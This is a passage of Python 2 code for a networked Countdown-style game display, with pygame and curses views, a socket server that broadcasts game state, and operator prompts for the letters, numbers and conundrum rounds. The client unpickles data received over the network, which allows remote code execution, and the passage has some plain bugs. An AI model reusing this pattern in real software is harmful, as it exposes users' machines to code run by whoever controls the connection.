tmp = pygame.Surface((rect[2], rect[3]), pygame.SRCALPHA);
tmp.blit(surface, (0, 0), rect);
shade = pygame.Surface((rect[2], rect[3]), pygame.SRCALPHA);
shade.fill(colour);
tmp.blit(shade, (0, 0));
surface.blit(tmp, (rect[0], rect[1]));
def draw_flippything(surface, rect, letter_width, letter_height, border_px, border_colour, spacing, state, text, unrevealed_text):
surface.fill(border_colour, (rect[0] - border_px, rect[1] - border_px, rect[2] + 2 * border_px, rect[3] + 2 * border_px));
if state == 0:
draw_label(surface, rect, unrevealed_text, fgcolour=(128, 128, 128), bgcolour=(0, 0, 255), align=ALIGN_CENTRE);
elif state == 1:
x = rect[0];
y = rect[1];
x_step = letter_width + spacing;
for l in list(text):
if l and l != ' ':
draw_label(surface, (x, y, letter_width, letter_height), l, fgcolour=(255, 255, 255), bgcolour=(0, 0, 255), align=ALIGN_CENTRE);
x += x_step;
else:
draw_label(surface, rect, "INCORRECT", fgcolour=(255, 255, 255), bgcolour=(0, 0, 255), align=ALIGN_CENTRE);
class GameState:
def __init__(self):
self.title = "";
self.p1 = "";
self.p2 = "";
self.s1 = 0;
self.s2 = 0;
self.numbers_rack = (0, 0, 0, 0, 0, 0);
self.numbers_target = 0;
self.letters_rack = "";
self.bottom_rack = "";
self.conundrum_scramble = "";
self.conundrum_top_state = 0;
self.conundrum_solution = "";
self.conundrum_bottom_state = 0;
self.round_type = "";
def load(self, filename):
f = open(filename, "rb");
pickled_state = f.read();
state = pickle.loads(pickled_state);
self.set_state(state);
def save(self, filename):
f = open(filename, "wb");
pickled_state = pickle.dumps(state);
f.write(pickled_state);
f.close();
def reveal_conundrum_scramble(self):
if self.conundrum_top_state == 0:
self.conundrum_top_state = 1;
else:
self.conundrum_top_state = 0;
def reveal_conundrum_incorrect(self):
if self.conundrum_bottom_state == 2:
self.conundrum_bottom_state = 0;
else:
self.conundrum_bottom_state = 2;
def reveal_conundrum_answer(self):
if self.conundrum_top_state == 0:
return;
if self.conundrum_bottom_state == 1:
self.conundrum_bottom_state = 0;
else:
self.conundrum_bottom_state = 1;
def read_message(self, sock, tout=None):
c = "";
len_str = "";
while c != '\n':
try:
if c == "":
sock.settimeout(tout);
else:
sock.settimeout(0);
c = sock.recv(1);
except socket.timeout, e:
return -1;
except socket.error, e:
(errnum, errstr) = e;
if errnum == errno.EINTR:
continue;
else:
raise;
if c == 'A':
return 1;
elif c == 'B':
return 2;
elif c == 'C':
return 3;
elif c != '\n':
len_str = len_str + c;
message_length = int(len_str);
message = None;
while message == None:
try:
message = recvall(sock, message_length);
except socket.error, e:
(errnum, errstr) = e;
if errnum == errno.EINTR:
continue;
else:
raise;
state = pickle.loads(message);
self.set_state(state);
return 0;
def set_state(self, state):
self.title = state.title;
self.p1 = state.p1;
self.p2 = state.p2;
self.s1 = state.s1;
self.s2 = state.s2;
self.numbers_rack = state.numbers_rack;
self.letters_rack = state.letters_rack;
self.bottom_rack = state.bottom_rack;
self.numbers_target = state.numbers_target;
self.conundrum_scramble = state.conundrum_scramble;
self.conundrum_solution = state.conundrum_solution;
self.conundrum_top_state = state.conundrum_top_state;
self.conundrum_bottom_state = state.conundrum_bottom_state;
self.round_type = state.round_type;
def draw_rectangle(win, tly, tlx, bry, brx):
win.addch(tly, tlx, curses.ACS_ULCORNER);
win.addch(tly, brx, curses.ACS_URCORNER);
win.addch(bry, tlx, curses.ACS_LLCORNER);
win.addch(bry, brx, curses.ACS_LRCORNER);
for x in xrange(tlx + 1, brx):
win.addch(tly, x, curses.ACS_HLINE);
win.addch(bry, x, curses.ACS_HLINE);
for y in xrange(tly + 1, bry):
win.addch(y, tlx, curses.ACS_VLINE);
win.addch(y, brx, curses.ACS_VLINE);
class GUILiveGameWindow:
title_height = PercentageHeight(8);
nameplate_top = PercentageHeight(12);
nameplate_height = PercentageHeight(6);
nameplate1_left = PercentageWidth(5);
nameplate2_left = PercentageWidth(55);
nameplate1_width = PercentageWidth(40);
nameplate2_width = PercentageWidth(40);
nameplate_border = PercentageHeight(0.5);
score_border = PercentageHeight(0.5);
score_top = PercentageHeight(20);
score_height = PercentageHeight(20);
score1_left = PercentageWidth(12.5);
score2_left = PercentageWidth(62.5);
score1_width = PercentageWidth(25);
score2_width = PercentageWidth(25);
letters_top = PercentageHeight(55);
letters_max_width = PercentageWidth(90);
letters_max_height = PercentageHeight(40);
letter_ratio = 1; # width/height
num_letters = 9;
letters_border = PercentageWidth(2);
letters_spacing = PercentageWidth(1);
numbers_top = PercentageHeight(50);
numbers_left = PercentageWidth(10);
numbers_width = PercentageWidth(80);
target_top = PercentageHeight(53);
target_left = PercentageWidth(35);
target_width = PercentageWidth(30);
target_height = PercentageHeight(19);
numbers_sel_top = PercentageHeight(75);
numbers_sel_max_height = PercentageHeight(23);
numbers_sel_max_width = PercentageWidth(90);
numbers_sel_border = PercentageWidth(1);
numbers_sel_spacing = PercentageWidth(1);
number_ratio = 1;
num_numbers = 6;
con_top = letters_top;
con_max_width = letters_max_width;
con_max_height = letters_max_height;
con_border = letters_border;
con_spacing = letters_spacing;
def __init__(self, background_surface=None):
self.background = background_surface;
self.background_scaled = None;
def rescale_background(self, surface):
x_scale = float(surface.get_width()) / float(self.background.get_width());
y_scale = float(surface.get_height()) / float(self.background.get_height());
scale = max((x_scale, y_scale));
scaled_width = int(scale * self.background.get_width());
scaled_height = int(scale * self.background.get_height());
self.background_scaled = pygame.transform.scale(self.background, (scaled_width, scaled_height));
def draw(self, surface, state):
if self.background:
if self.background_scaled is None:
self.rescale_background(surface);
bg_scaled_top = (self.background_scaled.get_height() - surface.get_height()) / 2;
bg_scaled_left = (self.background_scaled.get_width() - surface.get_width()) / 2;
surface.blit(self.background_scaled, (0, 0), area=(bg_scaled_left, bg_scaled_top, bg_scaled_left + surface.get_width(), bg_scaled_top + surface.get_height()));
else:
surface.fill((0, 0, 0, 255));
title_colour = (255, 255, 255);
name_colour = (255, 255, 255);
name_bg = (0, 0, 192);
score_colour = (255, 255, 255);
score_bg = (0, 0, 255);
letter_colour = (255, 255, 255);
letter_bg = (0, 0, 192);
target_colour = (255, 255, 255);
target_bg = (0, 0, 255);
number_colour = (255, 255, 255);
number_bg = (0, 0, 192);
# Draw title
draw_label(surface, (0, 0, surface.get_width(), self.title_height.get_px(surface)), state.title, fgcolour=title_colour, align=ALIGN_CENTRE);
# Draw shaded area
score_border = int(self.nameplate_height.get_px(surface) / 2);
backing_height = self.score_top.get_px(surface) + self.score_height.get_px(surface) - self.nameplate_top.get_px(surface) + score_border * 2;
shade_area(surface,
(self.nameplate1_left.get_px(surface) - score_border,
self.nameplate_top.get_px(surface) - score_border,
self.nameplate1_width.get_px(surface) + score_border * 2,
backing_height),
(0, 0, 0, 96)
);
shade_area(surface,
(self.nameplate2_left.get_px(surface) - score_border,
self.nameplate_top.get_px(surface) - score_border,
self.nameplate2_width.get_px(surface) + score_border * 2,
backing_height),
(0, 0, 0, 96)
);
# Draw nameplates
draw_label(surface,
(self.nameplate1_left.get_px(surface),
self.nameplate_top.get_px(surface),
self.nameplate1_width.get_px(surface),
self.nameplate_height.get_px(surface)),
state.p1, fgcolour=name_colour,
bgcolour=name_bg, align=ALIGN_CENTRE,
border_colour=(192, 192, 192),
border_size=self.nameplate_border.get_px(surface));
draw_label(surface,
(self.nameplate2_left.get_px(surface),
self.nameplate_top.get_px(surface),
self.nameplate2_width.get_px(surface),
self.nameplate_height.get_px(surface)),
state.p2, fgcolour=name_colour,
bgcolour=name_bg, align=ALIGN_CENTRE,
border_colour=(192, 192, 192),
border_size=self.nameplate_border.get_px(surface));
score1_left_px = self.score1_left.get_px(surface);
score2_left_px = self.score2_left.get_px(surface);
score1_width_px = self.score1_width.get_px(surface);
score2_width_px = self.score2_width.get_px(surface);
score_height_px = self.score_height.get_px(surface);
if score_height_px * 2 < score1_width_px:
score1_left_px += (score1_width_px - score_height_px * 2) / 2
score1_width_px = score_height_px * 2
if score_height_px * 2 < score2_width_px:
score2_left_px += (score2_width_px - score_height_px * 2) / 2
score2_width_px = score_height_px * 2
# Draw scores
draw_label(surface,
(score1_left_px,
self.score_top.get_px(surface),
score1_width_px, score_height_px),
str(state.s1), fgcolour=score_colour,
bgcolour=score_bg, align=ALIGN_RIGHT,
border_colour=(192, 192, 192),
border_size=self.nameplate_border.get_px(surface));
draw_label(surface,
(score2_left_px,
self.score_top.get_px(surface),
score2_width_px, score_height_px),
str(state.s2), fgcolour=score_colour,
bgcolour=score_bg, align=ALIGN_RIGHT,
border_colour=(192, 192, 192),
border_size=self.nameplate_border.get_px(surface));
# Shade area
if state.round_type in ("L", "N", "C"):
shade_area(surface, (
0, surface.get_height() / 2,
surface.get_width(),
surface.get_height() / 2),
(0, 0, 0, 96)
);
if state.round_type == 'L':
letters_max_width_px = self.letters_max_width.get_px(surface);
letters_max_height_px = self.letters_max_height.get_px(surface);
letter_width_px = (letters_max_width_px - 2 * self.letters_border.get_px(surface) - (self.num_letters - 1) * self.letters_spacing.get_px(surface)) / 9;
letter_height_px = (letters_max_height_px - 4 * self.letters_border.get_px(surface)) / 2;
if letter_width_px > letter_height_px * self.letter_ratio:
letter_width_px = letter_height_px * self.letter_ratio;
letters_width_px = self.num_letters * letter_width_px + self.letters_border.get_px(surface) * 2 + (self.num_letters - 1) * self.letters_spacing.get_px(surface);
letters_height_px = letters_max_height_px;
elif letter_width_px < letter_height_px * self.letter_ratio:
letter_height_px = int(letter_width_px / self.letter_ratio);
letters_height_px = 2 * letter_height_px + 4 * self.letters_border.get_px(surface);
letters_width_px = letters_max_width_px;
else:
letters_width_px = letters_max_width_px;
letters_height_px = letters_max_height_px;
letters_left_px = (surface.get_width() - letters_width_px) / 2;
letters_top_px = self.letters_top.get_px(surface);
letters_start_x = letters_left_px + self.letters_border.get_px(surface);
letters_start_y = letters_top_px + self.letters_border.get_px(surface);
letters_x = letters_start_x;
letters_x_step = letter_width_px + self.letters_spacing.get_px(surface);
letters_border_px = self.letters_border.get_px(surface);
# Draw backing
surface.fill((0, 192, 255), (letters_left_px, letters_top_px, letters_width_px, letters_height_px));
# Remove from the top rack those letters in the bottom rack
top_rack = list(state.letters_rack.upper());
bottom_rack = list(state.bottom_rack.upper());
for l in bottom_rack:
for i in range(0, len(top_rack)):
if top_rack[i] == l:
top_rack[i] = ' ';
break;
#for l in top_rack:
# if l:
# draw_label(surface,
# (letters_x, letters_start_y,
# letter_width_px, letter_height_px),
# l, fgcolour=letter_colour,
# bgcolour=letter_bg, align=ALIGN_CENTRE);
# letters_x += letters_x_step;
flippything_border_px = letters_border_px / 2;
flippything_border_colour = (0, 0, 128);
draw_flippything(surface,
(letters_start_x,
letters_start_y,
letters_width_px - 2 * letters_border_px,
letter_height_px),
letter_width_px, letter_height_px,
flippything_border_px, flippything_border_colour,
self.letters_spacing.get_px(surface),
1, "".join(top_rack), "");
draw_flippything(surface,
(letters_start_x,
letters_start_y + letter_height_px + 2 * letters_border_px,
letters_width_px - 2 * letters_border_px,
letter_height_px),
letter_width_px, letter_height_px,
flippything_border_px, flippything_border_colour,
self.letters_spacing.get_px(surface),
1, "".join(bottom_rack), "");
elif state.round_type == 'N':
if state.numbers_target is None or state.numbers_target <= 0:
target_str = "";
else:
target_str = str(state.numbers_target);
# Draw backing for target
target_border_px = self.target_height.get_px(surface) / 20;
surface.fill((0, 192, 255),
(self.target_left.get_px(surface) - target_border_px,
self.target_top.get_px(surface) - target_border_px,
self.target_width.get_px(surface) + 2 * target_border_px,
self.target_height.get_px(surface) + 2 * target_border_px));
# Draw numbers target
draw_label(surface,
(self.target_left.get_px(surface),
self.target_top.get_px(surface),
self.target_width.get_px(surface),
self.target_height.get_px(surface)),
target_str, fgcolour=target_colour,
bgcolour=target_bg, align=ALIGN_CENTRE);
numbers_sel_top_px = self.numbers_sel_top.get_px(surface);
numbers_sel_width_px = self.numbers_sel_max_width.get_px(surface);
numbers_sel_height_px = self.numbers_sel_max_height.get_px(surface);
number_width = (numbers_sel_width_px - (self.num_numbers - 1) * self.numbers_sel_spacing.get_px(surface) - 2 * self.numbers_sel_border.get_px(surface)) / self.num_numbers;
number_height = numbers_sel_height_px - 2 * self.numbers_sel_border.get_px(surface);
if number_width > number_height * self.number_ratio:
number_width = int(number_height * self.number_ratio);
numbers_sel_width_px = self.num_numbers * number_width + (self.num_numbers - 1) * self.numbers_sel_spacing.get_px(surface) + 2 * self.numbers_sel_border.get_px(surface);
elif number_width < number_height * self.number_ratio:
number_height = int(number_width / self.number_ratio);
numbers_sel_height_px = number_height + 2 * self.numbers_sel_border.get_px(surface);
numbers_sel_left_px = (surface.get_width() - numbers_sel_width_px) / 2;
numbers_sel_start_x = numbers_sel_left_px + self.numbers_sel_border.get_px(surface);
numbers_sel_x_step = number_width + self.numbers_sel_spacing.get_px(surface);
numbers_sel_x = numbers_sel_start_x;
numbers_sel_y = numbers_sel_top_px + self.numbers_sel_border.get_px(surface);
# Draw backing for numbers
surface.fill((0, 192, 255),
(numbers_sel_left_px, numbers_sel_top_px,
numbers_sel_width_px, numbers_sel_height_px));
# Draw numbers
if state.numbers_rack:
for n in state.numbers_rack:
draw_label(surface,
(numbers_sel_x, numbers_sel_y,
number_width, number_height),
str(n), fgcolour=number_colour,
bgcolour=number_bg, align=ALIGN_CENTRE);
numbers_sel_x += numbers_sel_x_step;
elif state.round_type == 'C':
con_top_px = self.con_top.get_px(surface);
con_width_px = self.con_max_width.get_px(surface);
con_height_px = self.con_max_height.get_px(surface);
letter_width = (con_width_px - 2 * self.con_border.get_px(surface) - (self.num_letters - 1) * self.con_spacing.get_px(surface)) / self.num_letters;
letter_height = (con_height_px - 4 * self.con_border.get_px(surface)) / 2;
if letter_width > letter_height * self.letter_ratio:
letter_width = int(letter_height * self.letter_ratio);
con_width_px = self.num_letters * letter_width + (self.num_letters - 1) * self.con_spacing.get_px(surface) + 2 * self.con_border.get_px(surface);
elif letter_width < letter_height * self.letter_ratio:
letter_height = int(letter_width / self.letter_ratio);
con_height_px = 2 * letter_height + 4 * self.con_border.get_px(surface);
con_left_px = (surface.get_width() - con_width_px) / 2;
con_border_px = self.con_border.get_px(surface);
surface.fill((0, 192, 255), (con_left_px, con_top_px, con_width_px, con_height_px));
flippything_border_px = int(con_border_px / 2);
flippything_border_colour = (0, 0, 128);
draw_flippything(surface,
(con_left_px + con_border_px,
con_top_px + con_border_px,
con_width_px - 2 * con_border_px, letter_height),
letter_width, letter_height,
flippything_border_px, flippything_border_colour,
self.con_spacing.get_px(surface),
state.conundrum_top_state,
state.conundrum_scramble, "COUNTDOWN");
draw_flippything(surface,
(con_left_px + con_border_px,
con_top_px + letter_height + 3 * con_border_px,
con_width_px - 2 * con_border_px, letter_height),
letter_width, letter_height,
flippything_border_px, flippything_border_colour,
self.con_spacing.get_px(surface),
state.conundrum_bottom_state,
state.conundrum_solution, "CONUNDRUM");
class CursesLiveGameWindow:
def set_window_size(self, win):
self.win = win;
self.win.scrollok(1);
(self.height, self.width) = win.getmaxyx();
self.ypad = 1;
self.title_y = self.ypad;
self.score_y = self.ypad + 2;
self.letters_y = self.ypad + 6;
self.number_target_y = self.ypad + 6;
self.number_rack_y = self.ypad + 8;
self.top_flippything_y = self.ypad + 6;
self.bottom_flippything_y = self.ypad + 8;
self.bottom_rack_y = self.ypad + 8;
def __init__(self, win):
self.set_window_size(win);
def draw(self, state):
self.win.erase();
self.win.addstr(self.title_y, 0, ("{0:^" + str(self.width) + "}").format(state.title), curses.A_REVERSE);
# Need four characters for the score, and the number of
# characters in the longest name. e.g.
#
# Alice Aardvark 30
# Bob Bravo 43
player_name_attr = curses.A_BOLD;
score_attr = colour(curses.COLOR_YELLOW) | curses.A_BOLD;
max_name_length = self.width - 4;
name_field_length = min(max_name_length, max(len(state.p1), len(state.p2)));
score_width = 4 + name_field_length;
self.win.move(self.score_y, (self.width - score_width) / 2);
self.win.addstr(("{0:<" + str(name_field_length) + "." + str(name_field_length) + "}").format(state.p1), player_name_attr);
self.win.addstr("{0:>4}".format(state.s1), score_attr);
self.win.move(self.score_y + 1, (self.width - score_width) / 2);
self.win.addstr(("{0:<" + str(name_field_length) + "." + str(name_field_length) + "}").format(state.p2), player_name_attr);
self.win.addstr("{0:>4}".format(state.s2), score_attr);
if state.round_type == 'L':
# If a letter is in the bottom rack, don't display it
# in the top rack
letters_rack_list = list(state.letters_rack);
# Build up bottom_rack as we go: add as uppercase
# letters if they're in the selection, lowercase if
# they aren't.
bottom_rack = [];
for l in state.bottom_rack.upper():
if l in letters_rack_list:
ind = letters_rack_list.index(l);
letters_rack_list[ind] = " ";
bottom_rack.append(l);
else:
bottom_rack.append(l.lower());
while len(letters_rack_list) < 9:
letters_rack_list.append(' ');
rack_x = (self.width - (len(letters_rack_list) * 2 + 1)) / 2;
draw_rectangle(self.win, self.letters_y - 1, rack_x - 2, self.letters_y + 1, rack_x + len(letters_rack_list) * 2 + 1 + 1);
self.win.move(self.letters_y, rack_x);
for l in letters_rack_list:
self.win.addstr(" " + l, colour2(curses.COLOR_WHITE, curses.COLOR_BLUE) | curses.A_BOLD);
self.win.addstr(" ", colour2(curses.COLOR_WHITE, curses.COLOR_BLUE) | curses.A_BOLD);
if bottom_rack != []:
self.win.move(self.bottom_rack_y, rack_x);
padded_bottom_rack = "{0:^9}".format(''.join(bottom_rack));
attr = colour2(curses.COLOR_WHITE, curses.COLOR_BLUE) | curses.A_BOLD;
for l in padded_bottom_rack:
self.win.addstr(" ", attr);
# Show phantom letters in red
if l.islower():
self.win.addstr(l.upper(), colour2(curses.COLOR_WHITE, curses.COLOR_RED) | curses.A_BOLD);
else:
self.win.addstr(l, attr);
self.win.addstr(" ", attr);
draw_rectangle(self.win, self.bottom_rack_y - 1, rack_x - 2, self.bottom_rack_y + 1, rack_x + len(padded_bottom_rack) * 2 + 1 + 1);
if self.letters_y + 2 == self.bottom_rack_y:
self.win.addch(self.letters_y + 1, rack_x - 2, curses.ACS_LTEE);
self.win.addch(self.letters_y + 1, rack_x + len(padded_bottom_rack) * 2 + 1 + 1, curses.ACS_RTEE);
elif state.round_type == 'N':
self.win.move(self.number_target_y, (self.width - 5) / 2);
if state.numbers_target > 0:
self.win.addstr(" {0:>3d} ".format(state.numbers_target), curses.A_BOLD | colour2(curses.COLOR_YELLOW, curses.COLOR_BLACK));
number_rack = list(state.numbers_rack);
num_digits = 0;
for n in number_rack:
num_digits += len(str(n));
rack_start_x = (self.width - (num_digits + 2 * len(number_rack) + len(number_rack) - 1)) / 2;
if rack_start_x < 0:
rack_start_x = 0;
self.win.move(self.number_rack_y, rack_start_x);
num_index = 0;
for n in number_rack:
if num_index > 0:
self.win.addstr(" ");
self.win.addstr(" {0:d} ".format(int(n)), colour2(curses.COLOR_WHITE, curses.COLOR_BLUE) | curses.A_BOLD);
num_index += 1;
elif state.round_type == 'C':
att = colour2(curses.COLOR_WHITE, curses.COLOR_BLUE);
conundrum_x = (self.width - (len(state.conundrum_scramble) * 2 + 1)) / 2;
# Draw necessary rectangles
draw_rectangle(self.win, self.top_flippything_y - 1, conundrum_x - 2, self.top_flippything_y + 1, conundrum_x + len(state.conundrum_scramble) * 2 + 1 + 1);
draw_rectangle(self.win, self.bottom_flippything_y - 1, conundrum_x - 2, self.bottom_flippything_y + 1, conundrum_x + len(state.conundrum_scramble) * 2 + 1 + 1);
if self.top_flippything_y + 2 == self.bottom_flippything_y:
self.win.addch(self.top_flippything_y + 1, conundrum_x - 2, curses.ACS_LTEE);
self.win.addch(self.top_flippything_y + 1, conundrum_x + len(state.conundrum_scramble) * 2 + 1 + 1, curses.ACS_RTEE);
# Draw the conundrum scramble flippything
self.win.move(self.top_flippything_y, conundrum_x);
if state.conundrum_top_state > 0:
for l in state.conundrum_scramble:
self.win.addstr(" ", att | curses.A_BOLD);
self.win.addstr(l, att | curses.A_BOLD);
self.win.addstr(" ", att);
else:
self.win.addstr(" COUNTDOWN ", att);
# And the solution flippything
self.win.move(self.bottom_flippything_y, (self.width - (len(state.conundrum_solution) * 2 + 1)) / 2);
if state.conundrum_bottom_state == 0:
self.win.addstr(" CONUNDRUM ", att);
else:
if state.conundrum_bottom_state == 1:
word = state.conundrum_solution;
att = colour2(curses.COLOR_WHITE, curses.COLOR_BLUE) | curses.A_BOLD;
else:
word = "INCORRECT";
att = colour2(curses.COLOR_WHITE, curses.COLOR_RED) | curses.A_BOLD;
for l in word:
self.win.addstr(" ", att);
self.win.addstr(l, att);
self.win.addstr(" ", att);
self.win.refresh();
################################################################################
def listener_thread_fn(sock, dialogue):
while True:
conn, addr = sock.accept();
connected_sockets_lock.acquire();
connected_sockets.append(conn);
dialogue_write(dialogue, "Received connection from " + str(addr));
connected_sockets_lock.release();
################################################################################
# SERVER FUNCTIONS
def load_dictionary(filename):
f = open(filename, "r");
lines = f.readlines();
lines = map(lambda x: x.rstrip().upper(), lines);
f.close();
return lines;
def dialogue_write(dialogue, data):
dialogue.addstr(data);
dialogue.addstr("\n");
dialogue.refresh();
def dialogue_prompt(dialogue, prompt):
dialogue.addstr(prompt);
dialogue.refresh();
curses.echo();
# curses.curs_set(1);
answer = dialogue.getstr();
# curses.curs_set(0);
curses.noecho();
return answer;
def broadcast_message(msg):
connected_sockets_lock.acquire();
socklist = connected_sockets[:];
connected_sockets_lock.release();
for sock in socklist:
try:
sock.sendall(msg);
except:
connected_sockets_lock.acquire();
if sock in connected_sockets:
connected_sockets.remove(sock);
connected_sockets_lock.release();
return 0;
def broadcast_state(state):
pickled_state = pickle.dumps(state);
return broadcast_message(str(len(pickled_state)) + "\n" + pickled_state);
def start_clock():
broadcast_message("A");
def pause_clock():
broadcast_message("B");
def resume_clock():
broadcast_message("C");
def set_conundrum(state, view, dialogue):
scramble = dialogue_prompt(dialogue, "Conundrum scramble: ");
scramble = scramble.upper();
if scramble == "":
dialogue_write(dialogue, "Aborted.");
return 1;
solution = dialogue_prompt(dialogue, "Conundrum solution: ");
solution = solution.upper();
if solution == "":
dialogue_write(dialogue, "Aborted.");
return 1;
scramble_list = list(scramble);
solution_list = list(solution);
scramble_list.sort();
solution_list.sort();
if scramble_list != solution_list:
dialogue_write(dialogue, "Scramble and solution are not anagrams of each other: not proceeding.");
return 1;
state.conundrum_scramble = scramble;
state.conundrum_solution = solution;
state.conundrum_top_state = 0;
state.conundrum_bottom_state = 0;
dialogue_write(dialogue, "Done.");
return 0;
def conundrum_round(state, view, dialogue):
if state.conundrum_scramble == "" or state.conundrum_solution == "":
set_conundrum(state, view, dialogue);
if state.conundrum_scramble == "" or state.conundrum_solution == "":
return 1;
state.round_type = 'C';
state.conundrum_top_state = 0;
state.conundrum_bottom_state = 0;
dialogue_write(dialogue, "Press S to reveal and start clock.");
return 0;
def numbers_round(state, view, dialogue):
state.round_type = 'N';
state.numbers_rack = ();
state.numbers_target = -1;
broadcast_state(state);
view.draw(state);
numstr = dialogue_prompt(dialogue, "Enter six numbers separated by spaces: ");
if numstr == "":
dialogue_write(dialogue, "Aborted.");
return 1;
numstr = re.sub(" *", " ", numstr);
numbers = numstr.split(" ");
if len(numbers) != 6:
dialogue_write(dialogue, "That's not six numbers.");
return 1;
for n in numbers:
try:
if int(n) < 0:
dialogue_write(dialogue, n + " is not a positive number.");
return 1;
except:
dialogue_write(dialogue, "At least one of those isn't a number.");
return 1;
reordered_numbers = [];
for l in numbers:
if int(l) > 10:
reordered_numbers.append(int(l));
for s in numbers:
if int(s) <= 10:
reordered_numbers.append(int(s));
state.numbers_rack = tuple(reordered_numbers);
state.numbers_target = -1;
state.round_type = 'N';
broadcast_state(state);
view.draw(state);
numstr = None;
while numstr == None:
numstr = dialogue_prompt(dialogue, "Enter target: ");
try:
if int(numstr) < 0:
dialogue_write(dialogue, n + " is not a positive number.");
numstr = None;
except:
dialogue_write(dialogue, "That's not a number.");
numstr = None;
# If there are any large numbers in the selection, put them at the
# start.
state.numbers_target = int(numstr);
return 0;
def show_letters_maxes(state, view, dialogue):
if dictionary == []:
dialogue_write(dialogue, "No dictionary loaded.");
if state.round_type == 'L':
allowable_words = [];
maxlen = 0;
rlist_orig = list(state.letters_rack);
for word in dictionary:
wlist = list(word);
rlist = rlist_orig[:];
for l in wlist:
if l in rlist:
rlist.remove(l);
else:
break;
else:
if len(word) > maxlen:
maxlen = len(word);
allowable_words.append(word);
allowable_words = filter(lambda x : len(x) >= maxlen, allowable_words);
if allowable_words == []:
dialogue_write(dialogue, "No words available from this selection.");
else:
num_words = 0;
maxes_str = "";
for word in allowable_words:
if num_words > 0:
maxes_str += ", ";
maxes_str += word;
num_words += 1;
dialogue_write(dialogue, "Maximum " + str(maxlen) + ": " + maxes_str);
return 0;
def letters_round(state, view, dialogue):
dialogue_write(dialogue, "Enter letters, then press ENTER.");
state.round_type = 'L';
state.letters_rack = "";
state.bottom_rack = "";
broadcast_state(state);
view.draw(state);
key = curses.ERR;
while key != ord('\n'):
key = dialogue.getch();
if key == curses.KEY_BACKSPACE or key == curses.erasechar():
if state.letters_rack != "":
state.letters_rack = state.letters_rack[:-1];
broadcast_state(state);
view.draw(state);
elif (key >= ord('A') and key <= ord('Z')) or (key >= ord('a') and key <= ord('z')):
letter = chr(key).upper();
if len(state.letters_rack) < 9:
state.letters_rack = state.letters_rack + letter;
broadcast_state(state);
view.draw(state);
return 0;
def set_match_info(state, view, dialogue):
title = dialogue_prompt(dialogue, "Title [" + state.title + "]? ");
if title != "":
state.title = title;
p1 = dialogue_prompt(dialogue, "Player 1 [" + state.p1 + "]? ");
if p1 != "":
state.p1 = p1;
p2 = dialogue_prompt(dialogue, "Player 2 [" + state.p2 + "]? ");
if p2 != "":
state.p2 = p2;
def set_score(state, view, dialogue, player):
if player == 1 or player == 2:
operation = 0;
if player == 1:
answer = dialogue_prompt(dialogue, state.p1 + "'s score (" + str(state.s1) + ")? ");
elif player == 2:
answer = dialogue_prompt(dialogue, state.p2 + "'s score (" + str(state.s2) + ")? ");
if answer == "":
return;
if answer[0] == '+':
operation = 1;
answer = answer[1:];
elif answer[0] == '-':
operation = -1;
answer = answer[1:];
else:
operation = 0;
try:
score = int(answer);
except:
dialogue_write(dialogue, answer + " is not a number.");
return;
if player == 1:
if operation == -1:
state.s1 -= score;
elif operation == 0:
state.s1 = score;
else:
state.s1 += score;
else:
if operation == -1:
state.s2 -= score;
elif operation == 0:
state.s2 = score;
else:
state.s2 += score;
else:
answer = dialogue_prompt(dialogue, "Score (" + str(state.s1) + "-" + str(state.s2) + ")? ");
if answer == "":
return;
split_score = answer.split("-");
if len(split_score) == 2 and len(split_score[0]) > 0 and len(split_score[1]) > 0:
try:
score1 = int(split_score[0]);
score2 = int(split_score[1]);
state.s1 = score1;
state.s2 = score2;
except:
dialogue_write(dialogue, "Invalid score " + answer);
return;
else:
if answer[0] == '+':
operation = 1;
answer = answer[1:];
elif answer[0] == '-':
operation = -1;
answer = answer[1:];
else:
operation = 0;
try:
score = int(answer);
if operation == -1:
state.s1 -= score;
state.s2 -= score;
elif operation == 1:
state.s1 += score;
state.s2 += score;
else:
state.s1 = score;
state.s2 = score;
except:
dialogue_write(dialogue, "Invalid score " + answer);
return;
################################################################################
server = "localhost";
port = 12012;
client_role = False;
music_file_name = "";
state_file_name = os.environ["HOME"] + "/.livegame_state";
dict_file_name = "";
parser = argparse.ArgumentParser(description="Act as a client or server for a live co-event game.");
parser.add_argument("-s", action="store", dest="server", default="localhost");
parser.add_argument("-p", action="store", dest="port", default="12012");
parser.add_argument("-c", action="store_true", dest="client_role");
parser.add_argument("-m", action="store", dest="music_file_name", default="");
parser.add_argument("-d", action="store", dest="dict_file_name", default="");
parser.add_argument("-b", action="store", dest="background_image_file", default="");
parser.add_argument("-f", action="store", dest="font_file", default="");
opts = parser.parse_args();
server = opts.server;
port = int(opts.port);
client_role = opts.client_role;
music_file_name = opts.music_file_name;
dict_file_name = opts.dict_file_name;
background_image_file = opts.background_image_file;
font_file = opts.font_file;
dictionary = [];
if dict_file_name != "":
try:
dictionary = load_dictionary(dict_file_name);
except:
print "Couldn't open " + dict_file_name + "\n";
sys.exit(1);
if client_role:
screen_width = 800
screen_height = 600
music_paused = False;
resized = False;
title_bar = True;
pygame.mixer.pre_init(frequency=48000);
pygame.init();
if music_file_name != "":
pygame.mixer.init();
sound = pygame.mixer.Sound(music_file_name);
else:
sound = None;
if background_image_file:
background_image = pygame.image.load(background_image_file);
else:
background_image = None;
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
sock.connect((server, port));
screen = pygame.display.set_mode((screen_width, screen_height), pygame.RESIZABLE);
state = GameState();
view = GUILiveGameWindow(background_image);
view.draw(screen, state);
while True:
#clear_message(screen);
try:
msg_type = state.read_message(sock, 0.5);
except socket.error, e:
#display_message(screen, "LOST CONNECTION");
sock.close();
time.sleep(5);
sock = None;
while sock == None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
try:
sock.connect(server, port);
except socket.error:
sock.close();
sock = None;
time.sleep(5);
continue;
if msg_type == 1:
if sound != None:
sound.stop();
sound.play();
music_paused = False;
pygame.mixer.unpause();
elif msg_type == 2:
if sound != None:
if music_paused:
pygame.mixer.unpause();
else:
pygame.mixer.pause();
music_paused = not(music_paused);
elif msg_type == 3:
if sound != None:
pygame.mixer.unpause();
music_paused = False;
if resized:
flags = pygame.RESIZABLE;
if not title_bar:
flags |= pygame.NOFRAME;
screen = pygame.display.set_mode((screen_width, screen_height), flags);
view.rescale_background(screen);
resized = False;
if msg_type != -1:
view.draw(screen, state);
pygame.display.flip();
pygame.event.pump();
event = pygame.event.poll();
while event.type != pygame.NOEVENT:
if event.type == pygame.VIDEORESIZE:
screen_width = max(10, event.w)
screen_height = max(10, event.h)
resized = True
elif event.type == pygame.KEYDOWN:
